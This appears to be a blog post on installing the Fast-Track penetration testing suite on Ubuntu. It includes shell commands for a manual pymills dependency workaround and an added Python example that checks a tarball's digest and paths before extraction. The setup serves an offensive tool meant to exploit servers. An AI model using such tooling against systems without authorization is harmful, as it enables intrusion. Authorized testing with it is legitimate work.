Fast-Track is an automated penetration testing suite developed by David Kennedy. This security suite helps the penetration tester identify and exploit servers using various techniques. Combining the power of the Metasploit Framework with the automation of the attacks, the whole pen test process becomes effective and time-saving (where it’s OK to finish in under 3 minutes). While attempting to install Fast-Track 4.0 on Ubuntu 10.04 I came across a missing Python package issue: the package called pymills-3.4.tar.gz isn’t available from the location configured in the setup file. The workaround is to comment out lines 80 and 81 of setup.py and download the pymills package manually. Here you can find the instructions to install Fast-Track 4.0 successfully.

apt-get install subversion
svn co http://svn.thepentest.com/fasttrack/
cd fasttrack/
python setup.py install

Would you like to attempt all dependancies, yes or no: yes

tar: pymills-3.4.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
mv: cannot stat `pymills-3.4': No such file or directory
cd: 1: can't cd to pymills/

Comment out the lines 80 and 81

# subprocess.Popen('wget http://pypi.python.org/packages/source/p/pymills/pymills-3.4.tar.gz;tar -zxvf pymills-3.4.tar.gz;mv pymills-3.4 pymills;cd pymills/; python setup.py install', shell=True).wait()
# subprocess.Popen('rm -rf pymills; rm -rf pymills-3.4.tar.gz', shell=True).wait()

Download manually the missing package

wget http://pypi.inqbus.de/pymills/pymills-3.4.tar.gz

Uncompress and install pymills

tar xvfz pymills-3.4.tar.gz
mv pymills-3.4 pymills
cd  pymills
python setup.py install

Processing dependencies for pymills==3.4
Finished processing dependencies for pymills==3.4

Now you can rerun the Fast Track installation

python setup.py install

Would you like to attempt all dependencies, yes or no: yes

***********************************************
******* Performing dependency checks… *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***
Run Fast Track with:  python fast-track.py -i

and let’s pop a box. Video: Fast-Track at ShmooCon 2009
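As an added example (not part of the original post, and not Fast-Track’s own code), the Python below shows the fetch-and-install step from the commented-out setup.py lines done with an integrity check in front of it. The original chains wget, tar and `python setup.py install` through a shell and installs whatever came back; this version extracts only after the archive’s SHA-256 matches a pinned digest, and aborts on any tar member that would land outside the destination directory. The tarball contents and the pinned digest are constructed inside `demo()` purely for illustration (there is no upstream pymills digest on the page to copy); `hmac.compare_digest` is used so the digest comparison does not leak timing.

```python
"""Verify a downloaded tarball before extracting and installing it.

Added example: not from the original post and not part of Fast-Track.
"""
from __future__ import annotations

import hashlib
import hmac
import io
import tarfile
import tempfile
from pathlib import Path


class IntegrityError(Exception):
    """Raised when the archive fails the digest or the path-containment check."""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_and_extract(archive: bytes, expected_sha256: str, dest: Path) -> list[str]:
    """Extract a .tar.gz held in memory into `dest` and return the member names.

    Nothing is written unless the digest matches, and a member whose resolved
    path lies outside `dest` (e.g. "../x") aborts the whole extraction.
    """
    actual = sha256_hex(archive)
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise IntegrityError(f"sha256 mismatch: expected {expected_sha256}, got {actual}")
    dest = dest.resolve()
    extracted: list[str] = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            target = (dest / member.name).resolve()
            if target != dest and dest not in target.parents:
                raise IntegrityError(f"member escapes destination: {member.name}")
            if not (member.isfile() or member.isdir()):
                raise IntegrityError(f"unsupported member type: {member.name}")
            tar.extract(member, dest)
            extracted.append(member.name)
    return extracted


def build_tarball(members: list[tuple[str, bytes]]) -> bytes:
    """Build a small .tar.gz in memory from (name, content) pairs (constructed test data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in members:
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def demo() -> dict[str, object]:
    """Run the good, tampered and path-traversal cases in a scratch directory."""
    # Constructed stand-in for pymills-3.4.tar.gz; the pinned digest is computed
    # here only because there is no upstream value on the page to copy.
    good = build_tarball([("pymills-3.4/setup.py", b"# placeholder setup.py\n"),
                          ("pymills-3.4/pymills/__init__.py", b"")])
    pinned = sha256_hex(good)
    tampered = bytes([good[0] ^ 0x01]) + good[1:]  # one flipped byte
    traversal = build_tarball([("../escaped.py", b"")])
    results: dict[str, object] = {}
    with tempfile.TemporaryDirectory() as scratch:
        dest = Path(scratch)
        results["extracted"] = sorted(verify_and_extract(good, pinned, dest))
        results["setup_py_present"] = (dest / "pymills-3.4" / "setup.py").is_file()
        try:
            verify_and_extract(tampered, pinned, dest)
            results["tampered_rejected"] = False
        except IntegrityError:
            results["tampered_rejected"] = True
        try:
            verify_and_extract(traversal, sha256_hex(traversal), dest)
            results["traversal_rejected"] = False
        except IntegrityError:
            results["traversal_rejected"] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In a real install the bytes would come from the download and the pinned digest from the upstream release announcement or a signed checksum file; the point is that `python setup.py install` runs only on an archive whose contents were decided before the download, not after it.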
